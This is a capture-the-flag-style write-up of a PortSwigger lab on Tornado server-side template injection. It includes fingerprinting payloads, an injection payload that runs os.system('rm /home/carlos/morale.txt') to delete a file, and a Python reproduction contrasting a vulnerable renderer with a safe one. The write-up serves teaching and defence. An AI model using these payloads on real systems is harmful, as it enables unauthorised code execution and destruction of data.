Basic server-side template injection (code context) | 2023
2023-02-08 02:52:07 Source: infosecwriteups.com

Portswigger Lab Solution — SSTI Code Context | Karthikeyan Nagaraj

Check out the Basics of SSTI in my previous post

Lab Description:

  • This lab is vulnerable to server-side template injection due to the way it unsafely uses a Tornado template.
  • To solve the lab, review the Tornado documentation to discover how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory.
  • You can log in to your own account using the following credentials: wiener:peter

Analysis:

  1. Log in to the account wiener:peter and post a comment.

For example, I'm inserting {{5*5}} as the comment.

2. Check out My Account. There is a "Preferred name" setting, which may be vulnerable: the choice is sent to the server as an expression (user.name, user.first_name, ...) rather than as plain data.

3. Intercept the traffic through Burp and send the request to Repeater (Ctrl+R).

4. Let's try to inject Tornado template expressions.

Tornado uses the syntax below for expressions, and {% ... %} for statements such as import:

{{ someExpression }}

5. This is a "code context" injection: our input already lands inside an existing {{ }} expression in the template, so instead of adding a new {{ }} we close the expression that is already there and open our own. Test whether the injected expression is evaluated by sending the payload below (URL-encoded, as it appears in the request body) in the parameter blog-post-author-display:

}}{%25+import+os+%25}{{+"+Working"

Reload the page in the browser (with Burp's Intercept turned off, or the proxy disabled) to see the rendered result.

It's working: the string "Working" appears in the rendered page, so the injected expression was evaluated.

Some generic payloads for fingerprinting the template engine and what their output tells you:

{{7*7}} = 49 (the expression is evaluated)
${7*7} = ${7*7} (the ${ } syntax is echoed back unevaluated, so it is not a ${ }-style engine)
{{foobar}} = Error (an undefined name raises an error)
{{7*'7'}} = 7777777 (string repetition, which identifies a Python-based engine such as Tornado or Jinja2; Twig would give 49)

6. We know the syntax of Tornado templates and we know that the expressions are evaluated, so let's use Python code as the payload to delete morale.txt. The {% import os %} statement makes the os module available inside the template, and the second expression calls os.system():

}}{%25+import+os+%25}{{os.system('rm%20/home/carlos/morale.txt')

URL-decoded, that is:

}}{% import os %}{{os.system('rm /home/carlos/morale.txt')
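To make the "code context" point concrete, here is a minimal local reproduction of the bug with Tornado's own template engine, next to a safe version. This is an added example, not the lab's or the author's code: it assumes the tornado package is installed, and the User class, the template strings and the blog-post-author-display handling are constructed stand-ins for the lab. The payload keeps user.name in front of the }} so that the expression already in the template stays non-empty (Tornado's parser rejects an empty {{ }}), and it calls os.path.basename() instead of a destructive os.system("rm ...") so it is harmless to run.

```python
# Added example (not the lab's code): Tornado SSTI in a code context.
# Assumes: pip install tornado.  User, the template strings and the
# blog-post-author-display handling are constructed stand-ins for the lab.
from tornado.template import Template


class User:
    """Constructed stand-in for the lab's logged-in user."""
    name = "wiener"
    nickname = "peter"


def render_author_vulnerable(display_expr: str, user: type) -> str:
    """The bug: the value of blog-post-author-display is spliced into the
    template SOURCE, inside an expression that already exists, so whatever
    the client sends is compiled as Python by Tornado's template compiler."""
    source = "<p>Posted by {{ " + display_expr + " }}</p>"
    return Template(source).generate(user=user).decode("utf-8")


def render_author_safe(display_choice: str, user: type) -> str:
    """The fix: the template source is a constant and the client's choice only
    selects one of a fixed set of attributes, which is passed in as data.
    Unknown choices fall back to the account name instead of being rendered."""
    allowed = {"user.name": user.name, "user.nickname": user.nickname}
    author = allowed.get(display_choice, user.name)
    return Template("<p>Posted by {{ author }}</p>").generate(author=author).decode("utf-8")


# Same shape as the lab payload (URL-decoded): close the existing expression,
# add an import statement, open a second expression.  os.path.basename() is a
# harmless stand-in for os.system('rm /home/carlos/morale.txt').
PAYLOAD = 'user.name}}{% import os %}{{ " Working: " + os.path.basename("/home/carlos/morale.txt")'


def looks_injectable(render, user: type) -> bool:
    """Detection probe in the style of step 5: inject arithmetic after closing
    the existing expression.  A template-engine result ("49") proves evaluation;
    a literal "7*7" or no change means the input was treated as data."""
    out = render("user.name}}{{ 7*7", user)
    return "49" in out and "7*7" not in out


if __name__ == "__main__":
    print("benign   :", render_author_vulnerable("user.name", User))
    print("injected :", render_author_vulnerable(PAYLOAD, User))
    print("probe vuln/safe:", looks_injectable(render_author_vulnerable, User),
          looks_injectable(render_author_safe, User))
    print("safe     :", render_author_safe(PAYLOAD, User))
```

The vulnerable renderer prints "Posted by wiener Working: morale.txt", showing that the {% import os %} statement and the second expression were compiled and run; the safe renderer never lets client input reach the template source, so the same payload renders the default author name and the arithmetic probe comes back unevaluated.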

Feel free to ask queries via LinkedIn and to buy me a coffee : )

Thank you for Reading!!

Happy Hunting ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng

Source: https://infosecwriteups.com/basic-server-side-template-injection-code-context-2023-444f71b178bf?source=rss----7b722bfd1b8d--bug_bounty